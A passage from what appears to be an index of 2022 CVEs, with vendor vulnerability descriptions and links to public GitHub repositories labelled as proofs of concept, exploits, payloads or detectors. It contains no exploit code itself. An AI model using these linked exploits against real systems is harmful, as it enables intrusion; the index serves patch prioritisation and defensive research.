Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
- [Alexandre-Bartel/CVE-2022-21340](https://github.com/Alexandre-Bartel/CVE-2022-21340)
### CVE-2022-21350 (2022-01-19)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L).
- [hktalent/CVE-2022-21350](https://github.com/hktalent/CVE-2022-21350)
### CVE-2022-21371 (2022-01-19)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [Mr-xn/CVE-2022-21371](https://github.com/Mr-xn/CVE-2022-21371)
- [Vulnmachines/Oracle-WebLogic-CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)
- [Cappricio-Securities/CVE-2022-21371](https://github.com/Cappricio-Securities/CVE-2022-21371)
### CVE-2022-21392 (2022-01-19)
Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Policy Framework). Supported versions that are affected are 13.4.0.0 and 13.5.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Enterprise Manager Base Platform accessible data. CVSS 3.1 Base Score 8.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
- [mbadanoiu/CVE-2022-21392](https://github.com/mbadanoiu/CVE-2022-21392)
### CVE-2022-21445 (2022-04-19)
Vulnerability in the Oracle JDeveloper product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks of this vulnerability can result in takeover of Oracle JDeveloper. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [M0chae1/CVE-2022-21445](https://github.com/M0chae1/CVE-2022-21445)
- [hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic)
### CVE-2022-21449 (2022-04-19)
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
- [jfrog/jfrog-CVE-2022-21449](https://github.com/jfrog/jfrog-CVE-2022-21449)
- [jmiettinen/CVE-2022-21449-vuln-test](https://github.com/jmiettinen/CVE-2022-21449-vuln-test)
- [notkmhn/CVE-2022-21449-TLS-PoC](https://github.com/notkmhn/CVE-2022-21449-TLS-PoC)
- [marschall/psychic-signatures](https://github.com/marschall/psychic-signatures)
- [thack1/CVE-2022-21449](https://github.com/thack1/CVE-2022-21449)
- [Damok82/SignChecker](https://github.com/Damok82/SignChecker)
- [fundaergn/CVE-2022-21449](https://github.com/fundaergn/CVE-2022-21449)
- [Skipper7718/CVE-2022-21449-showcase](https://github.com/Skipper7718/CVE-2022-21449-showcase)
- [davwwwx/CVE-2022-21449](https://github.com/davwwwx/CVE-2022-21449)
- [AlexanderZinoni/CVE-2022-21449](https://github.com/AlexanderZinoni/CVE-2022-21449)
- [HeyMrSalt/AIS3-2024-Project-D5Team](https://github.com/HeyMrSalt/AIS3-2024-Project-D5Team)
### CVE-2022-21500 (2022-05-19)
Vulnerability in Oracle E-Business Suite (component: Manage Proxies). The supported version that is affected is 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered. <br> <br>Oracle E-Business Suite 12.1 is not impacted by this vulnerability. Customers should refer to the Patch Availability Document for details. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [Cappricio-Securities/CVE-2022-21500](https://github.com/Cappricio-Securities/CVE-2022-21500)
### CVE-2022-21587 (2022-10-18)
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [hieuminhnv/CVE-2022-21587-POC](https://github.com/hieuminhnv/CVE-2022-21587-POC)
- [rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit)
- [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-)
### CVE-2022-21658 (2022-01-20)
Rust is a multi-paradigm, general-purpose programming language designed for performance and safety, especially safe concurrency. The Rust Security Response WG was notified that the `std::fs::remove_dir_all` standard library function is vulnerable a race condition enabling symlink following (CWE-363). An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete. Rust 1.0.0 through Rust 1.58.0 is affected by this vulnerability with 1.58.1 containing a patch. Note that the following build targets don't have usable APIs to properly mitigate the attack, and are thus still vulnerable even with a patched toolchain: macOS before version 10.10 (Yosemite) and REDOX. We recommend everyone to update to Rust 1.58.1 as soon as possible, especially people developing programs expected to run in privileged contexts (including system daemons and setuid binaries), as those have the highest risk of being affected by this. Note that adding checks in your codebase before calling remove_dir_all will not mitigate the vulnerability, as they would also be vulnerable to race conditions like remove_dir_all itself. The existing mitigation is working as intended outside of race conditions.
- [sagittarius-a/cve-2022-21658](https://github.com/sagittarius-a/cve-2022-21658)
### CVE-2022-21660 (2022-02-09)
Gin-vue-admin is a backstage management system based on vue and gin. In versions prior to 2.4.7 low privilege users are able to modify higher privilege users. Authentication is missing on the `setUserInfo` function. Users are advised to update as soon as possible. There are no known workarounds.
- [UzJu/Gin-Vue-admin-poc-CVE-2022-21660](https://github.com/UzJu/Gin-Vue-admin-poc-CVE-2022-21660)
- [UzJu/CVE-2022-21660](https://github.com/UzJu/CVE-2022-21660)
### CVE-2022-21661 (2022-01-06)
WordPress is a free and open-source content management system written in PHP and paired with a MariaDB database. Due to improper sanitization in WP_Query, there can be cases where SQL injection is possible through plugins or themes that use it in a certain way. This has been patched in WordPress version 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability.
- [TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection](https://github.com/TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection)
- [purple-WL/wordpress-CVE-2022-21661](https://github.com/purple-WL/wordpress-CVE-2022-21661)
- [0x4E0x650x6F/Wordpress-cve-CVE-2022-21661](https://github.com/0x4E0x650x6F/Wordpress-cve-CVE-2022-21661)
- [z92g/CVE-2022-21661](https://github.com/z92g/CVE-2022-21661)
- [guestzz/CVE-2022-21661](https://github.com/guestzz/CVE-2022-21661)
- [safe3s/CVE-2022-21661](https://github.com/safe3s/CVE-2022-21661)
- [WellingtonEspindula/SSI-CVE-2022-21661](https://github.com/WellingtonEspindula/SSI-CVE-2022-21661)
- [daniel616/CVE-2022-21661-Demo](https://github.com/daniel616/CVE-2022-21661-Demo)
- [sealldeveloper/CVE-2022-21661-PoC](https://github.com/sealldeveloper/CVE-2022-21661-PoC)
- [p4ncontomat3/CVE-2022-21661](https://github.com/p4ncontomat3/CVE-2022-21661)
- [CharonDefalt/WordPress--CVE-2022-21661](https://github.com/CharonDefalt/WordPress--CVE-2022-21661)
### CVE-2022-21668 (2022-01-10)
pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.
- [sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability](https://github.com/sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability)
### CVE-2022-21724 (2022-02-02)
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
- [ToontjeM/CVE-2022-21724](https://github.com/ToontjeM/CVE-2022-21724)
### CVE-2022-21728 (2022-02-03)
Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ReverseSequence` does not fully validate the value of `batch_dim` and can result in a heap OOB read. There is a check to make sure the value of `batch_dim` does not go over the rank of the input, but there is no check for negative values. Negative dimensions are allowed in some cases to mimic Python's negative indexing (i.e., indexing from the end of the array), however if the value is too negative then the implementation of `Dim` would access elements before the start of an array. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
- [mwina/CVE-2022-21728-test](https://github.com/mwina/CVE-2022-21728-test)
### CVE-2022-21789 (2022-08-01)
In audio ipi, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06478101; Issue ID: ALPS06478101.
- [docfate111/CVE-2022-21789](https://github.com/docfate111/CVE-2022-21789)
### CVE-2022-21839 (2022-01-11)
Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability
- [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-)
### CVE-2022-21877 (2022-01-11)
Storage Spaces Controller Information Disclosure Vulnerability
- [Big5-sec/cve-2022-21877](https://github.com/Big5-sec/cve-2022-21877)
### CVE-2022-21881 (2022-01-11)
Windows Kernel Elevation of Privilege Vulnerability
- [theabysslabs/CVE-2022-21881](https://github.com/theabysslabs/CVE-2022-21881)
### CVE-2022-21882 (2022-01-11)
Win32k Elevation of Privilege Vulnerability
- [KaLendsi/CVE-2022-21882](https://github.com/KaLendsi/CVE-2022-21882)
- [David-Honisch/CVE-2022-21882](https://github.com/David-Honisch/CVE-2022-21882)
- [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882)
- [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc)
- [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882)
- [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882)
### CVE-2022-21894 (2022-01-11)
Secure Boot Security Feature Bypass Vulnerability
- [Wack0/CVE-2022-21894](https://github.com/Wack0/CVE-2022-21894)
- [ASkyeye/CVE-2022-21894-Payload](https://github.com/ASkyeye/CVE-2022-21894-Payload)
- [Wack0/batondrop_armv7](https://github.com/Wack0/batondrop_armv7)
- [bakedmuffinman/BlackLotusDetection](https://github.com/bakedmuffinman/BlackLotusDetection)
- [qjawls2003/BlackLotus-Detection](https://github.com/qjawls2003/BlackLotus-Detection)
- [nova-master/CVE-2022-21894-Payload-New](https://github.com/nova-master/CVE-2022-21894-Payload-New)
### CVE-2022-21907 (2022-01-11)
HTTP Protocol Stack Remote Code Execution Vulnerability
- [corelight/cve-2022-21907](https://github.com/corelight/cve-2022-21907)
- [mauricelambert/CVE-2022-21907](https://github.com/mauricelambert/CVE-2022-21907)
- [ZZ-SOCMAP/CVE-2022-21907](https://github.com/ZZ-SOCMAP/CVE-2022-21907)
- [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907)
- [p0dalirius/CVE-2022-21907-http.sys](https://github.com/p0dalirius/CVE-2022-21907-http.sys)
- [michelep/CVE-2022-21907-Vulnerability-PoC](https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC)
- [polakow/CVE-2022-21907](https://github.com/polakow/CVE-2022-21907)
- [gpiechnik2/nmap-CVE-2022-21907](https://github.com/gpiechnik2/nmap-CVE-2022-21907)
- [iveresk/cve-2022-21907-http.sys](https://github.com/iveresk/cve-2022-21907-http.sys)
- [iveresk/cve-2022-21907](https://github.com/iveresk/cve-2022-21907)
- [Malwareman007/CVE-2022-21907](https://github.com/Malwareman007/CVE-2022-21907)
- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher)
- [cassie0206/CVE-2022-21907](https://github.com/cassie0206/CVE-2022-21907)
- [EzoomE/CVE-2022-21907-RCE](https://github.com/EzoomE/CVE-2022-21907-RCE)
- [asepsaepdin/CVE-2022-21907](https://github.com/asepsaepdin/CVE-2022-21907)
- [kamal-marouane/CVE-2022-21907](https://github.com/kamal-marouane/CVE-2022-21907)
### CVE-2022-21970 (2022-01-11)
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
- [Malwareman007/CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)
### CVE-2022-21971 (2022-02-09)
Windows Runtime Remote Code Execution Vulnerability
- [0vercl0k/CVE-2022-21971](https://github.com/0vercl0k/CVE-2022-21971)
- [tufanturhan/CVE-2022-21971-Windows-Runtime-RCE](https://github.com/tufanturhan/CVE-2022-21971-Windows-Runtime-RCE)
- [Malwareman007/CVE-2022-21971](https://github.com/Malwareman007/CVE-2022-21971)
### CVE-2022-21974 (2022-02-09)
Roaming Security Rights Management Services Remote Code Execution Vulnerability
- [0vercl0k/CVE-2022-21974](https://github.com/0vercl0k/CVE-2022-21974)
### CVE-2022-21984 (2022-02-09)
Windows DNS Server Remote Code Execution Vulnerability
- [u201424348/CVE-2022-21984](https://github.com/u201424348/CVE-2022-21984)
### CVE-2022-21999 (2022-02-09)
Windows Print Spooler Elevation of Privilege Vulnerability
- [ly4k/SpoolFool](https://github.com/ly4k/SpoolFool)
### CVE-2022-22029 (2022-07-12)
Windows Network File System Remote Code Execution Vulnerability
- [mchoudhary15/CVE-2022-22029-NFS-Server-](https://github.com/mchoudhary15/CVE-2022-22029-NFS-Server-)
### CVE-2022-22057 (2022-06-14)
Use after free in graphics fence due to a race condition while closing fence file descriptor and destroy graphics timeline simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
- [diabl0w/CVE-2022-22057_SM-F926U](https://github.com/diabl0w/CVE-2022-22057_SM-F926U)
### CVE-2022-22063 (2022-12-14)
Memory corruption in Core due to improper configuration in boot remapper.
- [msm8916-mainline/CVE-2022-22063](https://github.com/msm8916-mainline/CVE-2022-22063)
### CVE-2022-22274 (2022-03-25)
A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall.
- [4lucardSec/Sonic_CVE-2022-22274_poc](https://github.com/4lucardSec/Sonic_CVE-2022-22274_poc)
- [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc)
- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656)
### CVE-2022-22296 (2022-01-24)
Sourcecodester Hospital's Patient Records Management System 1.0 is vulnerable to Insecure Permissions via the id parameter in manage_user endpoint. Simply change the value and data of other users can be displayed.
- [vlakhani28/CVE-2022-22296](https://github.com/vlakhani28/CVE-2022-22296)
### CVE-2022-22536 (2022-02-09)
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\n
- [ZZ-SOCMAP/CVE-2022-22536](https://github.com/ZZ-SOCMAP/CVE-2022-22536)
- [tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536](https://github.com/tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536)
### CVE-2022-22555 (2022-07-20)
Dell EMC PowerStore, contains an OS command injection Vulnerability. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege.
- [colaoo123/cve-2022-22555](https://github.com/colaoo123/cve-2022-22555)
### CVE-2022-22582 (2023-02-27)
A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5, macOS Monterey 12.3. A local user may be able to write arbitrary files.
- [poizon-box/CVE-2022-22582](https://github.com/poizon-box/CVE-2022-22582)
### CVE-2022-22600 (2022-03-18)
The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences.
- [KlinKlinKlin/MSF-screenrecord-on-MacOS](https://github.com/KlinKlinKlin/MSF-screenrecord-on-MacOS)
### CVE-2022-22620 (2022-03-18)
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..
- [kmeps4/CVE-2022-22620](https://github.com/kmeps4/CVE-2022-22620)
- [springsec/CVE-2022-22620](https://github.com/springsec/CVE-2022-22620)
- [bb33bb/dkjiayu.github.io](https://github.com/bb33bb/dkjiayu.github.io)
### CVE-2022-22629 (2022-09-23)
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution.
- [parsdefense/CVE-2022-22629](https://github.com/parsdefense/CVE-2022-22629)
### CVE-2022-22639 (2022-03-18)
A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges.
- [jhftss/CVE-2022-22639](https://github.com/jhftss/CVE-2022-22639)
### CVE-2022-22718 (2022-02-09)
Windows Print Spooler Elevation of Privilege Vulnerability
- [ahmetfurkans/CVE-2022-22718](https://github.com/ahmetfurkans/CVE-2022-22718)
### CVE-2022-22720 (2022-03-14)
Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling
- [Benasin/CVE-2022-22720](https://github.com/Benasin/CVE-2022-22720)
### CVE-2022-22733 (2022-01-20)
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
- [Zeyad-Azima/CVE-2022-22733](https://github.com/Zeyad-Azima/CVE-2022-22733)
### CVE-2022-22814 (2022-03-10)
The System Diagnosis service of MyASUS before 3.1.2.0 allows privilege escalation.
- [DShankle/CVE-2022-22814_PoC](https://github.com/DShankle/CVE-2022-22814_PoC)
### CVE-2022-22818 (2022-02-03)
The {% debug %} template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS.
- [Prikalel/django-xss-example](https://github.com/Prikalel/django-xss-example)
### CVE-2022-22822 (2022-01-08)
addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
- [nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827)
### CVE-2022-22828 (2022-01-27)
An insecure direct object reference for the file-download URL in Synametrics SynaMan before 5.0 allows a remote attacker to access unshared files via a modified base64-encoded filename string.
- [videnlabs/CVE-2022-22828](https://github.com/videnlabs/CVE-2022-22828)
### CVE-2022-22845 (2022-01-09)
QXIP SIPCAPTURE homer-app before 1.4.28 for HOMER 7.x has the same 167f0db2-f83e-4baa-9736-d56064a5b415 JWT secret key across different customers' installations.
- [OmriBaso/CVE-2022-22845-Exploit](https://github.com/OmriBaso/CVE-2022-22845-Exploit)
### CVE-2022-22850 (2022-01-26)
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_types.
- [Sant268/CVE-2022-22850](https://github.com/Sant268/CVE-2022-22850)
### CVE-2022-22851 (2022-01-26)
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the specialization parameter in doctors.php
- [Sant268/CVE-2022-22851](https://github.com/Sant268/CVE-2022-22851)
### CVE-2022-22852 (2022-01-26)
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_list.
- [Sant268/CVE-2022-22852](https://github.com/Sant268/CVE-2022-22852)
### CVE-2022-22885 (2022-02-16)
Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation.
- [miguelc49/CVE-2022-22885-2](https://github.com/miguelc49/CVE-2022-22885-2)
- [miguelc49/CVE-2022-22885-1](https://github.com/miguelc49/CVE-2022-22885-1)
### CVE-2022-22909 (2022-03-02)
HotelDruid v3.0.3 was discovered to contain a remote code execution (RCE) vulnerability which is exploited via an attacker inserting a crafted payload into the name field under the Create New Room module.
- [0z09e/CVE-2022-22909](https://github.com/0z09e/CVE-2022-22909)
- [kaal18/CVE-2022-22909](https://github.com/kaal18/CVE-2022-22909)
### CVE-2022-22916 (2022-02-17)
O2OA v6.4.7 was discovered to contain a remote code execution (RCE) vulnerability via /x_program_center/jaxrs/invoke.
- [0x7eTeam/CVE-2022-22916](https://github.com/0x7eTeam/CVE-2022-22916)
### CVE-2022-22947 (2022-03-03)
In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
- [lucksec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947)
- [scopion/cve-2022-22947](https://github.com/scopion/cve-2022-22947)
- [Vulnmachines/spring-cve-2022-22947](https://github.com/Vulnmachines/spring-cve-2022-22947)
- [Axx8/CVE-2022-22947_Rce_Exp](https://github.com/Axx8/CVE-2022-22947_Rce_Exp)
- [crowsec-edtech/CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)
- [Tas9er/SpringCloudGatewayRCE](https://github.com/Tas9er/SpringCloudGatewayRCE)
- [Greetdawn/CVE-2022-22947](https://github.com/Greetdawn/CVE-2022-22947)
- [Summer177/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/Summer177/Spring-Cloud-Gateway-CVE-2022-22947)
- [BerMalBerIst/CVE-2022-22947](https://github.com/BerMalBerIst/CVE-2022-22947)
- [tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway)
- [dingxiao77/-cve-2022-22947-](https://github.com/dingxiao77/-cve-2022-22947-)
- [flying0er/CVE-2022-22947-goby](https://github.com/flying0er/CVE-2022-22947-goby)
- [dbgee/CVE-2022-22947](https://github.com/dbgee/CVE-2022-22947)
- [nu0l/cve-2022-22947](https://github.com/nu0l/cve-2022-22947)
- [nanaao/CVE-2022-22947-POC](https://github.com/nanaao/CVE-2022-22947-POC)
- [hunzi0/CVE-2022-22947-Rce_POC](https://github.com/hunzi0/CVE-2022-22947-Rce_POC)
- [22ke/CVE-2022-22947](https://github.com/22ke/CVE-2022-22947)
- [M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE](https://github.com/M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE)
- [YutuSec/SpEL](https://github.com/YutuSec/SpEL)
- [Jun-5heng/CVE-2022-22947](https://github.com/Jun-5heng/CVE-2022-22947)
- [darkb1rd/cve-2022-22947](https://github.com/darkb1rd/cve-2022-22947)
- [mrknow001/CVE-2022-22947](https://github.com/mrknow001/CVE-2022-22947)
- [0x7eTeam/CVE-2022-22947](https://github.com/0x7eTeam/CVE-2022-22947)
- [ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code](https://github.com/ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code)
- [Arrnitage/CVE-2022-22947_exp](https://github.com/Arrnitage/CVE-2022-22947_exp)
- [PaoPaoLong-lab/Spring-CVE-2022-22947-](https://github.com/PaoPaoLong-lab/Spring-CVE-2022-22947-)
- [hh-hunter/cve-2022-22947-docker](https://github.com/hh-hunter/cve-2022-22947-docker)
- [k3rwin/spring-cloud-gateway-rce](https://github.com/k3rwin/spring-cloud-gateway-rce)
- [bysinks/CVE-2022-22947](https://github.com/bysinks/CVE-2022-22947)
- [Wrin9/CVE-2022-22947](https://github.com/Wrin9/CVE-2022-22947)
- [viemsr/spring_cloud_gateway_memshell](https://github.com/viemsr/spring_cloud_gateway_memshell)
- [Enokiy/cve-2022-22947-spring-cloud-gateway](https://github.com/Enokiy/cve-2022-22947-spring-cloud-gateway)
- [Nathaniel1025/CVE-2022-22947](https://github.com/Nathaniel1025/CVE-2022-22947)
- [Vancomycin-g/CVE-2022-22947](https://github.com/Vancomycin-g/CVE-2022-22947)
- [scopion/CVE-2022-22947-exp](https://github.com/scopion/CVE-2022-22947-exp)
- [sagaryadav8742/springcloudRCE](https://github.com/sagaryadav8742/springcloudRCE)
- [fbion/CVE-2022-22947](https://github.com/fbion/CVE-2022-22947)
- [talentsec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/talentsec/Spring-Cloud-Gateway-CVE-2022-22947)
- [aesm1p/CVE-2022-22947-POC-Reproduce](https://github.com/aesm1p/CVE-2022-22947-POC-Reproduce)
